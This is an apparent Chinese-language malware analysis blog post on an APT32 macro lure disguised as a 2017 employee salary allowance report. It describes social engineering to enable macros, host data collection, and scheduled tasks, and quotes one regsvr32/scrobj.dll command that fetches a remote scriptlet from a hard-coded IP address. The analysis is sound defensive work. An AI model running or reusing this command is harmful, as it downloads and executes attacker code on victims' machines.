APT32宏病毒分析

本来是想把这个APT样本全部都分析完了着，但是实在没有找到drop的样本
，就只能分析分析这个宏样本了
静态信息
样本名称 2017年员工工资性津贴额统计报告.doc
MD5 5458a2e4d784abb1a1127263bd5006b5
从样本名称看非常具有诱惑性，就是这种诱惑性是一切罪恶的源头
我们打开样本，可以看到社会工程学的运用，提示用户去启动宏，而用户一旦启动了宏，也正好中了黑客组织的圈套。

我们继续分析下宏样本，宏样本并没有被进行加密
我们对宏代码进行一下分析，宏首先会获取主机名称和一些其他的主机信息，然后生成一段随机名称作为文件名称，然后和硬编码的字符串进行拼接写入到文件中

然后执行命令，并且创建了一个计划任务

可以看到这个任务是50分钟执行一次的

继续又创建了一个任务

然后每30分钟执行此下面的命令
“regsvr32.exe” /s /n /u /i:http://80.255.3.87:80/a/b/allp/10009.jpg scrobj.dll
我们这个时候看一下每隔50分钟执行的命令，里面主要是下载了一个样本，并将它执行起来

这里我是只是掌握了10009.jpg的样本，剩下样本未知，发现会下载其他样本

很可惜，样本分析到这里就结束了，希望有样本可以跟我联系